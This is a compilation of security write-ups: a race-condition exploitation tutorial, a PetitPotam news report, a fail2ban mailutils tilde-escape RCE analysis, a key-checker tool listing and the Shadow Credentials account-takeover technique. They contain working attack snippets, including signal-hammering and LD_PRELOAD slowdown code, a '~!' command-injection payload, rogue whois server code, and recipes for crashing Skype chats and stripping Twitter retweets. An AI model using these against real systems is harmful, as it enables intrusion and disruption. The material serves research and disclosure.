#include <unistd.h>

char *globvar, *globvar2; // shared state, reachable from the handler

void vuln(int pwn) { // some lame signal handler
    free(globvar);
    free(globvar2); // double free when the handler runs twice
}

int main(int argc, char *argv[]) { // overflowz and code exec
    globvar = malloc(16);
    globvar2 = malloc(16);
    signal(SIGHUP, vuln);  // same handler...
    signal(SIGTERM, vuln); // ...for two different signals
    pause();               // all due to a pesky race condition
    return 0;
}

There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits. Here is a list of things that could trigger a race condition via signal handling (from Mitre's CWE database):

- Shared state (e.g. global data or static variables) that is accessible to both a signal handler and "regular" code
- Shared state between a signal handler and other signal handlers
- Use of non-reentrant functionality within a signal handler, which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.
- Association of the same signal handler function with multiple signals, which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.
- Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality
- While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems even when there are no concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses.
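The attacker's side of triggering such a handler race can be sketched very simply. The snippet below is hypothetical (the victim PID is whatever the vulnerable process happens to be running as); it just delivers the two registered signals back-to-back, over and over, hoping one invocation of the shared handler interrupts the other mid-free():

```c
#include <signal.h>
#include <sys/types.h>
#include <unistd.h>

/* Deliver SIGHUP and SIGTERM to the victim back-to-back, repeatedly.
 * Each pair is one attempt at landing both deliveries inside the
 * handler's race window. */
void hammer(pid_t victim, int rounds) {
    for (int i = 0; i < rounds; i++) {
        kill(victim, SIGHUP);   /* first entry into the shared handler */
        kill(victim, SIGTERM);  /* second entry, racing the first */
    }
}
```

As with every other example in this post, this would be run in a loop from several processes or threads at once to maximise the number of attempts per second.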
Out of everything just listed, the most common causes are either one signal handler being used for multiple signals, or two or more signals arriving in short enough succession of each other to fit the attack window of a TOCTOU race condition.

Methods of slowing down process execution:

Slowing down the execution of the target program is almost vital to achieving race conditions consistently, so here I will describe some of the common methods that can be used to do this. Some of these methods are outdated and will only work on older systems, but they are still worth including (especially if you're into CTFs). Deep symlink nesting (described in more detail below) is one old method that can be used to slow down program execution in order to aid race conditions. Another method is changing the value of the environment variable LD_DEBUG; setting this will result in output being sent to stderr, and if you then redirect stderr to a pipe, it can slow down or completely halt the setuid bin in question. To do this you would run something like:

LD_DEBUG=all some_program 2>&1

Usage of LD_DEBUG is somewhat outdated and no longer relevant for setuid binaries since glibc 2.3.4; that being said, it can still be used for some more esoteric bugs affecting legacy systems, and is also occasionally seen in solutions for CTFs. Another method of slowing down program execution is lowering its scheduling priority through use of the nice or renice commands. Technically, this isn't slowing down the program execution as such; rather, it forces the Linux scheduler to allocate fewer time slices to the execution of the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice(); syscall. If the value for nice is negative, the process will run with higher priority.
If it is a positive value, the process will run with lower priority. For example, the following call will cause the process to run at a ridiculously slow rate:

nice(19)

If you're familiar with writing Linux rootkits, you may already be aware of these methods, but you can also use dynamic linker tricks via LD_PRELOAD to slow down the execution of processes. This can be done by hooking common functions such as malloc(); or free();, so that once said functions are called within the vulnerable program, their speed of execution is reduced to a noticeable extent. One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you're using a virtual machine, there should be options available that allow you to limit the allocated amount of CPU resources and RAM, letting you test the potentially vulnerable program in a more controlled environment where you can slow things down with ease and with a lot of control. This method will only work while testing for certain classes of race conditions. One crude method of slowing down program/process execution speeds in order to increase the chance of a race condition occurring is taking physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device, so don't come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I've seen it done (which, according to my crazy IRL hacker friend, is supposedly one of the safer methods of physically overheating your computer) is to simply wet a towel (or a bunch of towels) and wrap them around your device while making sure that the fan in particular is covered completely. Deep symlinks can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions.
This is a very old and well-documented method, although these days it is practically useless (unless you're exploiting some old obscure system, or doing it for a CTF; I have seen this method utilized in CTF challenges before). Since Linux kernel 2.4.x, this method has been mitigated through a limit on the maximum number of symlink dereferences permitted during lookups, alongside limits on nesting depth. Despite this method being practically dead, I figured it's still worth covering because there are still some obscure cases where it can be utilized. Below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker's Hut):

This will cause the kernel to take a ridiculously long time to access a single file. Here is the situation after the above script is executed:

drwxr-xr-x  2 aeb  4096 l
lrwxrwxrwx  1 aeb    53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
lrwxrwxrwx  1 aeb    19 l1 -> l2/../l2/../l2/../l
lrwxrwxrwx  1 aeb    19 l2 -> l3/../l3/../l3/../l
lrwxrwxrwx  1 aeb    19 l3 -> l4/../l4/../l4/../l
lrwxrwxrwx  1 aeb    19 l4 -> l5/../l5/../l5/../l
drwxr-xr-x  2 aeb  4096 l5

The more parameters passed to the above bash script, the greater the depth of the symlinks, meaning it can take days or even weeks for the one lookup to finish. On older machines, this will result in application-level DoS. There are many other ways in which symbolic links can be abused to achieve race conditions; if you want to learn more, I'd suggest googling, as there's simply too much to explain in a single blog post. Yet another method of slowing down program execution is increasing the timer interrupt frequency in order to force more load onto the kernel. Timer interrupts within the Linux kernel have a long and extensive history, so I will not be going in-depth here.
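Of the methods above, the LD_PRELOAD trick is the easiest to sketch concretely. Below is a minimal hypothetical shim (file and symbol names are my own) that wraps libc's free() and adds a small delay to every call, widening the race window inside the target process. Note that the dynamic linker ignores LD_PRELOAD for setuid binaries, so this only applies to targets you can run under your own uid:

```c
/* slowfree.c - hypothetical LD_PRELOAD shim that delays every free().
 * Build:  gcc -shared -fPIC slowfree.c -o slowfree.so -ldl
 * Run:    LD_PRELOAD=./slowfree.so ./victim                      */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdlib.h>
#include <unistd.h>

void free(void *ptr) {
    static void (*real_free)(void *);
    if (!real_free)  /* resolve the real libc free() exactly once */
        real_free = (void (*)(void *))dlsym(RTLD_NEXT, "free");
    usleep(1000);    /* ~1ms of added latency per free() call */
    real_free(ptr);
}
```

The same pattern works for malloc(), write(), or whatever function the vulnerable code path leans on; the more the target calls it, the more the whole process crawls.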
In part 2 of this tutorial series you can expect many more advanced methods of slowing down process execution.

Final notes (and zero-days):

I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, as I'll be covering these in-depth in Part 2 of my race condition series. Meanwhile, I'll give you an overview of what you can expect from Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with. The second part of my tutorial series on race conditions will have a primary emphasis on race conditions in webapps, which I touched upon lightly in this post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I've covered what these bugs are and provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I'm going to spend most of part two covering the following three areas:

- More advanced techniques for identifying race conditions specifically within web applications, methods of bypassing protections against this, and lucrative sections of webapps to test in order to increase your chances of finding race condition bugs on a regular basis.
- More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications, since that will be the primary theme of Part 2 of this series).
- How to use practical dynamic linker tricks through hooking of (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with emphasis on using this to slow down program/process execution via added strain on hooked common functions, as opposed to using the dynamic linker for stealth-based hooking.
We are talking about exploiting race conditions here, not writing rootkits, so while some of these techniques are kind-of interchangeable, the methods I'll be sharing would be very inefficient for an LD_PRELOAD-based rootkit, as they would make the victim's machine slow as shit. For maintaining persistence on a hacked box, that is terrible, but for slowing down process execution to increase the odds of a race condition, it is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race! Finally, just like this first part of my race condition exploitation series, I'll be setting a trend by once again including two new zero-day exploits, both of which are race condition bugs.

Skype Race Condition 0day:

1. Create a Skype group chat
2. Add a bunch of people
3. Make two Skype bots and add them to the chat
4. Have one bot repeatedly set the topic to 'lol' (lowercase)
5. Have the other bot repeatedly set the topic to 'LOL' (uppercase)

For example, bot #1 repeatedly sends "/topic lololol" to the chat and bot #2 repeatedly sends "/topic LOLOLOL". If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access Skype via the web (web.skype.com) to leave the group, and then reinstall Skype.

Twitter API TOC/TOU Race Condition 0day:

There was a race condition bug affecting Twitter's API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests concurrently to Twitter, it can result in the deletion of other people's likes/retweets/followers.
You would write a script with multiple threads: some threads send an API request to retweet or like a tweet (from a third-party account), while the other threads simultaneously remove likes/RTs from the same tweet from the same third-party account, once again via a request to Twitter's API. As a result of the race condition taking place, this removes multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed by the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ retweets down to 16 retweets in a matter of minutes. The proof-of-concept code for this will be viewable within the "Exploits and Code Examples" section of the upcoming site of 0xFFFF, where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team. That's all for now; part two will be coming soon, with more zerodays and a much bigger emphasis on the exploitation of race condition bugs within web applications. Source: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
22. New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains July 26, 2021 Ravie Lakshmanan

A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, to authenticate with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain. The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol that's used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network." Specifically, the attack enables a domain controller to authenticate against a remote NTLM relay under a bad actor's control using the MS-EFSRPC interface and share its authentication information. This is done by connecting to LSARPC, resulting in a scenario where the target server connects to an arbitrary server and performs NTLM authentication. "An attacker can target a Domain Controller to send its credentials by using the MS-EFSRPC protocol and then relaying the DC NTLM credentials to the Active Directory Certificate Services AD CS Web Enrollment pages to enroll a DC certificate," TRUESEC's Hasain Alshakarti said. "This will effectively give the attacker an authentication certificate that can be used to access domain services as a DC and compromise the entire domain."
While disabling support for MS-EFSRPC doesn't stop the attack from functioning, Microsoft has since issued mitigations for the issue, while characterizing "PetitPotam" as a "classic NTLM relay attack," which permits attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay those validated authentication requests in order to access network services. "To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing," Microsoft noted. "PetitPotam takes advantage of servers where the Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay Attacks." To safeguard against this line of attack, the Windows maker recommends that customers disable NTLM authentication on the domain controller. In the event NTLM cannot be turned off for compatibility reasons, the company is urging users to take one of the two steps below:

- Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic.
- Disable NTLM for Internet Information Services (IIS) on AD CS Servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.

PetitPotam marks the third major Windows security issue disclosed over the past month, after the PrintNightmare and SeriousSAM (aka HiveNightmare) vulnerabilities. Source: https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html
23. fail2ban – Remote Code Execution JAKUB ŻOCZEK | July 26, 2021 | Research

This article is about the recently published security advisory for a pretty popular piece of software – fail2ban (CVE-2021-32749). The vulnerability could be massively exploited and lead to root-level code execution on multiple boxes; however, this is rather hard for a regular person to achieve. It all has its roots in the mailutils package, and I found it by total accident when playing with the mail command. fail2ban analyses logs (or other data sources) in search of brute-force traces in order to block such attempts based on the IP address. There are plenty of rules for different services (SSH, SMTP, HTTP, etc.). There are also defined actions that can be performed after blocking a client. One of these actions is sending an e-mail. If you search the Internet for how to send an e-mail from the command line, you will often get this solution:

$ echo "test e-mail" | mail -s "subject" user@example.org

That is exactly how one of fail2ban's actions is configured to send e-mails about a client getting blocked (./config/action.d/mail-whois.conf):

actionban = printf %%b "Hi,\n
            The IP <ip> has just been banned by Fail2Ban after
            <failures> attempts against <name>.\n\n
            Here is more information about <ip> :\n
            `%(_whois_command)s`\n
            Regards,\n
            Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest>

There is nothing suspicious about the above, until you know about one specific thing that can be found in the mailutils manual: the tilde escape sequences. The '~!' escape executes the specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The '~|' escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced.
If the command produced no output, mail assumes that something went wrong and retains the old contents of your message. This is the way it works in real life:

jz@fail2ban:~$ cat -n pwn.txt
     1  Next line will execute command
     2  ~! uname -a
     3
     4  Best,
     5  JZ
jz@fail2ban:~$ cat pwn.txt | mail -s "whatever" whatever@whatever.com
Linux fail2ban 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
jz@fail2ban:~$

If you go back to the previously mentioned fail2ban e-mail action, you can notice there is whois output attached to the e-mail body. So if we could add a tilde escape sequence to the whois output for our IP address – well, it should end up with code execution. As root. What are our options? As attackers we need to control the whois output – how do we achieve that? Well, the first thing that came to mind was to kindly ask my ISP to contact RIPE and make a pretty custom entry for my particular IP address. Unfortunately – it doesn't work like that. RIPE/ARIN/APNIC and the others put in entries for whole IP ranges at minimum, not for one particular IP address. Also, I'm more than sure that achieving this in a formal way is extremely hard, plus the fact that putting a malicious payload in a whois entry would make people ask questions. Is there a way to start my own whois server? Surprisingly – there is, and you can find a couple of them running on the Internet. By digging through the whois-related RFCs you can find information about an attribute called ReferralServer. If your whois client finds such an attribute in the response, it will query the server set in its value to get more information about the IP address or domain.
Just take a look at what happens when querying whois for the 157.5.7.5 IP address:

$ whois 157.5.7.5
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2021, American Registry for Internet Numbers, Ltd.
#

NetRange:       157.1.0.0 - 157.14.255.255
CIDR:           157.4.0.0/14, 157.14.0.0/16, 157.1.0.0/16, 157.12.0.0/15, 157.2.0.0/15, 157.8.0.0/14
NetName:        APNIC-ERX-157-1-0-0
NetHandle:      NET-157-1-0-0-1
Parent:         NET157 (NET-157-0-0-0-0)
NetType:        Early Registrations, Transferred to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)

[… cut …]

ReferralServer:  whois://whois.apnic.net
ResourceLink:    http://wq.apnic.net/whois-search/static/search.html

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net

[… cut …]

Found a referral to whois.apnic.net.

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '157.0.0.0 - 157.255.255.255'

% Abuse contact for '157.0.0.0 - 157.255.255.255' is 'helpdesk@apnic.net'

inetnum:        157.0.0.0 - 157.255.255.255
netname:        ERX-NETBLOCK
descr:          Early registration addresses

[… cut …]

In theory, if you have a pretty big network, you could probably ask your Regional Internet Registry to use RWhois for your network. On the other hand, simply imagine black hats breaking into a server running rwhois, putting a malicious entry there, and then starting the attack. To be fair, this scenario seems way easier than becoming a big company to legally have your own whois server.
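To make the rogue-server scenario concrete: the whois protocol (RFC 3912) is just one query line over TCP followed by free-form text until the server closes the connection, so a malicious server only has to hand back registry-looking output with a tilde escape buried in it. Below is a hypothetical sketch of the per-client logic (all names and the payload are made up for illustration; the socket/bind/accept boilerplate on port 43 is omitted):

```c
#include <string.h>
#include <unistd.h>

/* The forged whois reply: looks like ordinary registry data, but the
 * "~!" line is a mailutils escape that mail(1) will execute once this
 * text ends up inside a composed message body. */
static const char *forged_reply(void) {
    return "inetnum:  203.0.113.0 - 203.0.113.255\n"
           "descr:    totally legitimate network\n"
           "~! touch /tmp/pwned-via-whois\n"
           "remarks:  have a nice day\n";
}

/* Per-client logic of the rogue server: write the reply to the
 * connected socket and hang up; the close() is what terminates a
 * whois response. */
static void handle_client(int fd) {
    const char *r = forged_reply();
    write(fd, r, strlen(r));
    close(fd);
}
```

The rest of the chain is exactly the fail2ban mail-whois action from earlier: the forged reply is substituted into the message body and piped into mail, which interprets the escape.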
In case you're a government and you can simply control network traffic – the task is way easier. By taking a closer look at the whois protocol, we can notice a few things: it was designed a really long time ago, it's pretty simple (you ask for an IP or domain name and get raw text output), and it's unencrypted at the network level. By simply performing a MITM attack on an unencrypted protocol (which whois is), attackers could just insert the tilde escape sequence and start an attack across multiple hosts. It's worth remembering that the root problem here is mailutils, which has this flaw by design. I believe a lot of people are unaware of this feature, and there's still plenty of software that could use the mail command this way. As history has shown many times – security is hard and complex. Sometimes a totally innocent functionality that you wouldn't ever suspect of being a threat can be the cause of a dangerous vulnerability. Author: Jakub Żoczek Source: https://research.securitum.com/fail2ban-remote-code-execution/
24. Key-Checker

Go scripts for checking API key / access token validity

Update V1.0.0 🚀
Added 37 checkers!

Screenshot 📷

How to Install
go get github.com/daffainfo/Key-Checker

Reference 📚
https://github.com/streaak/keyhacks

Source: https://github.com/daffainfo/Key-Checker
25. Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover Elad Shamir

The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we compromise an account that has delegated rights over a user account, we can simply reset their password, or, if we want to be less disruptive, we can set an SPN or disable Kerberos pre-authentication and try to roast the account. For computer accounts, it is a bit more complicated, but RBCD can get the job done. These techniques have their shortcomings:

- Resetting a user's password is disruptive, may be reported, and may not be permitted per the Rules of Engagement (ROE).
- Roasting is time-consuming and depends on the target having a weak password, which may not be the case.
- RBCD is hard to follow because someone (me) failed to write a clear and concise post about it. RBCD requires control over an account with an SPN, and creating a new computer account to meet that requirement may lead to detection and cannot be cleaned up until privilege escalation is achieved.

The recent work that Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_) published about AD CS made me think about other technologies that use Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos, and Windows Hello for Business was the obvious candidate, which led me to (re)discover an alternative technique for user and computer object takeover.

Tl;dr

It is possible to add "Key Credentials" to the attribute msDS-KeyCredentialLink of the target user/computer object and then perform Kerberos authentication as that account using PKINIT. In plain English: this is a much easier and more reliable takeover primitive against Users and Computers. A tool to operationalize this technique has been released alongside this post.
Previous Work When I looked into Key Trust, I found that Michael Grafnetter (@MGrafnetter) had already discovered this abuse technique and presented it at Black Hat Europe 2019. His discovery of this user and computer object takeover technique somewhat flew under the radar, I believe because this technique was only the primer to the main topic of his talk. Michael clearly demonstrated this abuse in his talk and noted that it affected both users and computers. In his presentation, Michael explained some of the inner workings of WHfB and the Key Trust model, and I highly recommend watching it. Michael has also been maintaining a library called DSInternals that facilitates the abuse of this mechanism, and a lot more. I recently ported some of Michael’s code to a new C# tool called Whisker to be used via implants on operations. More on that below. What is PKINIT? In Kerberos authentication, clients must perform “pre-authentication” before the KDC (the Domain Controller in an Active Directory environment) provides them with a Ticket Granting Ticket (TGT), which can subsequently be used to obtain Service Tickets. The reason for pre-authentication is that without it, anyone could obtain a blob encrypted with a key derived from the client’s password and try to crack it offline, as done in the AS-REP Roasting Attack. The client performs pre-authentication by encrypting a timestamp with their credentials to prove to the KDC that they have the credentials for the account. Using a timestamp rather than a static value helps prevent replay attacks. The symmetric key (secret key) approach, the most widely used and known, uses a key derived from the client’s password. If using RC4 encryption, this key would be the NT hash of the client’s password. The KDC has a copy of the client’s secret key and can decrypt the pre-authentication data to authenticate the client. 
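The offline-cracking risk that pre-authentication timestamps still carry (the basis of AS-REP roasting) can be sketched with a toy model. This is purely illustrative: a SHA-256 digest of the password stands in for the real key derivation, and an HMAC stands in for the RC4-HMAC/AES encryption of the timestamp; none of this is actual Kerberos wire format.

```python
import hashlib
import hmac

# Toy stand-ins: the "secret key" is a digest of the password, and
# "encrypting" the timestamp is an HMAC. Real Kerberos derives the key
# via the NT hash (RC4) or PBKDF2 (AES) and uses real encryption types.
def derive_key(password: str) -> bytes:
    return hashlib.sha256(password.encode()).digest()

def encrypt_timestamp(key: bytes, timestamp: str) -> bytes:
    return hmac.new(key, timestamp.encode(), hashlib.sha256).digest()

# Client side: prove knowledge of the key by "encrypting" a timestamp.
timestamp = "20210729120000Z"
blob = encrypt_timestamp(derive_key("Summer2021!"), timestamp)

# Attacker side: with a captured blob and a known plaintext structure,
# candidate passwords can be tried offline until one reproduces it.
def crack(blob: bytes, timestamp: str, wordlist):
    for candidate in wordlist:
        guess = encrypt_timestamp(derive_key(candidate), timestamp)
        if hmac.compare_digest(guess, blob):
            return candidate
    return None

recovered = crack(blob, timestamp, ["Password1", "Summer2021!", "Winter2020!"])
```

A weak password falls to this loop quickly, which is why roasting "depends on the target having a weak password", as noted earlier.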
The KDC uses the same key to encrypt a session key sent to the client along with the TGT. PKINIT is the less common, asymmetric key (public key) approach. The client has a public-private key pair and signs the pre-authentication data with their private key, and the KDC verifies the signature with the client’s public key. The KDC also has a public-private key pair, allowing for the exchange of a session key using one of two methods: Diffie-Hellman Key Delivery The Diffie-Hellman Key Delivery allows the KDC and the client to securely establish a shared session key that cannot be intercepted by attackers performing passive man-in-the-middle attacks, even if the attacker has the client’s or the KDC’s private key, (almost) providing Perfect Forward Secrecy. I say “almost” because the session key is also stored inside the encrypted part of the TGT, which is encrypted with the secret key of the KRBTGT account. Public Key Encryption Key Delivery Public Key Encryption Key Delivery uses the KDC’s private key and the client’s public key to envelop a session key generated by the KDC. Traditionally, Public Key Infrastructure (PKI) allows the KDC and the client to exchange their public keys using Digital Certificates signed by an entity that both parties have previously established trust with — the Certificate Authority (CA). This is the Certificate Trust model, which is most commonly used for smartcard authentication. PKINIT is not possible out of the box in every Active Directory environment. The key (pun intended) is that both the KDC and the client need a public-private key pair. However, if the environment has AD CS and a CA available, the Domain Controller will automatically obtain a certificate by default. No PKI? No Problem! Microsoft also introduced the concept of Key Trust to support passwordless authentication in environments that don’t support Certificate Trust. 
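Diffie-Hellman Key Delivery can be illustrated with a minimal sketch. The group parameters below are toy demo values (2**127 - 1 is a Mersenne prime), not the well-known MODP groups real PKINIT mandates; the point is only that both sides arrive at the same session key without ever transmitting it.

```python
import secrets

# Toy Diffie-Hellman group; real PKINIT uses standardized MODP groups.
p = 2**127 - 1
g = 5

# Each party keeps a private exponent and sends g^x mod p to the other.
kdc_priv = secrets.randbelow(p - 3) + 2
client_priv = secrets.randbelow(p - 3) + 2
kdc_pub = pow(g, kdc_priv, p)
client_pub = pow(g, client_priv, p)

# Both sides derive the same session key; a passive eavesdropper who
# only sees kdc_pub and client_pub cannot feasibly compute it.
kdc_session_key = pow(client_pub, kdc_priv, p)
client_session_key = pow(kdc_pub, client_priv, p)
```

As the text notes, forward secrecy is only "almost" achieved here, since the agreed session key is still copied into the TGT's KRBTGT-encrypted part.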
Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate. The client’s public key is stored in a multi-value attribute called msDS-KeyCredentialLink, introduced in Windows Server 2016. The values of this attribute are Key Credentials, which are serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account can have several linked devices. This trust model eliminates the need to issue client certificates for everyone using passwordless authentication. However, the Domain Controller still needs a certificate for the session key exchange. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can obtain a TGT for that user. Windows Hello for Business Provisioning and Authentication Windows Hello for Business (WHfB) supports multi-factor passwordless authentication. When the user enrolls, the TPM generates a public-private key pair for the user’s account — the private key should never leave the TPM. Next, if the Certificate Trust model is implemented in the organization, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. However, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account. The private key is protected by a PIN code, which Windows Hello allows replacing with a biometric authentication factor, such as fingerprint or face recognition. When a client logs in, Windows attempts to perform PKINIT authentication using their private key. 
Under the Key Trust model, the Domain Controller can verify their pre-authentication data using the raw public key in the corresponding NGC object stored in the client’s msDS-KeyCredentialLink attribute. Under the Certificate Trust model, the Domain Controller will validate the trust chain of the client’s certificate and then use the public key inside it. Once pre-authentication is successful, the Domain Controller can exchange a session key via Diffie-Hellman Key Delivery or Public Key Encryption Key Delivery. Note that I intentionally used the term “client” rather than “user” here because this mechanism applies to both users and computers. What About NTLM? PKINIT allows WHfB users, or, more traditionally, smartcard users, to perform Kerberos authentication and obtain a TGT. But what if they need to access resources that require NTLM authentication? To address that, the client can obtain a special Service Ticket that contains their NTLM hash inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity. The PAC is stored inside the encrypted part of the ticket, and the ticket is encrypted using the key of the service it is issued for. In the case of a TGT, the ticket is encrypted using the key of the KRBTGT account, which the user should not be able to decrypt. To obtain a ticket that the user can decrypt, the user must perform Kerberos User to User (U2U) authentication to itself. When I first read the title of the RFC for this mechanism, I thought to myself, “Does that mean we can abuse this mechanism to Kerberoast any user account? That must be too good to be true”. And it was — the risk of Kerberoasting was taken into consideration, and U2U Service Tickets are encrypted using the target user’s session key rather than their secret key. That presented another challenge for the U2U design — every time a client authenticates and obtains a TGT, a new session key is generated. 
Also, the KDC does not maintain a repository of active session keys — it extracts the session key from the client’s ticket. So, what session key should the KDC use when responding to a U2U TGS-REQ? The solution was sending a TGS-REQ containing the target user’s TGT as an “additional ticket”. The KDC will extract the session key from the TGT’s encrypted part (hence not really perfect forward secrecy) and generate a new service ticket. So, if a user requests a U2U Service Ticket from itself to itself, they will be able to decrypt it and access the PAC and the NTLM hash. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user. As per MS-PAC, the NTLM_SUPPLEMENTAL_CREDENTIAL entity is added to the PAC only if PKINIT authentication was performed. Back in 2017, Benjamin Delpy (@gentilkiwi) introduced code to Kekeo to support retrieving the NTLM hash of an account using this technique, and it will be added to Rubeus in an upcoming release. Abuse When abusing Key Trust, we are effectively adding alternative credentials to the account, or “Shadow Credentials”, allowing for obtaining a TGT and subsequently the NTLM hash for the user/computer. Those Shadow Credentials would persist even if the user/computer changed their password. Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options:
- Forge an RC4 silver ticket to impersonate privileged users to the corresponding host.
- Use the TGT to call S4U2Self to impersonate privileged users to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name.
Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised — it is restricted to the private key generated by the attacker. 
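The U2U flow described above can be modeled with a small sketch in which "encryption" is a deliberately fake stand-in (the key is simply paired with the plaintext, and decryption checks the key). All names and structures here are illustrative assumptions, not real Kerberos messages; the point is that the KDC recovers the target's session key from the additional ticket rather than from any stored state.

```python
import os

# Fake "encryption": pair the plaintext with the key; decryption only
# succeeds when the same key is presented. Purely illustrative.
def enc(key: bytes, data: dict) -> tuple:
    return (key, data)

def dec(key: bytes, blob: tuple) -> dict:
    stored_key, data = blob
    assert key == stored_key, "wrong key"
    return data

krbtgt_key = os.urandom(16)

# AS exchange: the TGT's encrypted part (under the krbtgt key) carries a
# fresh session key that the KDC does not store anywhere.
session_key = os.urandom(16)
tgt = enc(krbtgt_key, {"client": "victim", "session_key": session_key})

# U2U TGS-REQ: the requester includes the target's TGT as an
# "additional ticket"; the KDC extracts the session key from it and
# encrypts the new service ticket under that session key.
def u2u_tgs(krbtgt_key: bytes, additional_ticket: tuple, pac: dict) -> tuple:
    target_session_key = dec(krbtgt_key, additional_ticket)["session_key"]
    return enc(target_session_key, {"pac": pac})

service_ticket = u2u_tgs(krbtgt_key, tgt, {"nt_hash": "<NTLM hash>"})

# A self-to-self requester holds that session key from their own AS
# exchange, so the U2U ticket is decryptable, exposing the PAC contents.
pac = dec(session_key, service_ticket)["pac"]
```

Note how the secret key never comes into play for decrypting the U2U ticket, which is exactly why this does not enable Kerberoasting of arbitrary users.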
In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved. Whisker Alongside this post I am releasing a tool called “Whisker”. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol. Whisker has four functions:
- Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
- List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
- Remove — This function removes a key credential from the target object, specified by a DeviceID GUID.
- Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.
Requirements This technique requires the following:
- At least one Windows Server 2016 Domain Controller.
- A digital certificate for Server Authentication installed on the Domain Controller.
- Windows Server 2016 Functional Level in Active Directory.
- Compromise of an account with delegated rights to write to the msDS-KeyCredentialLink attribute of the target object. 
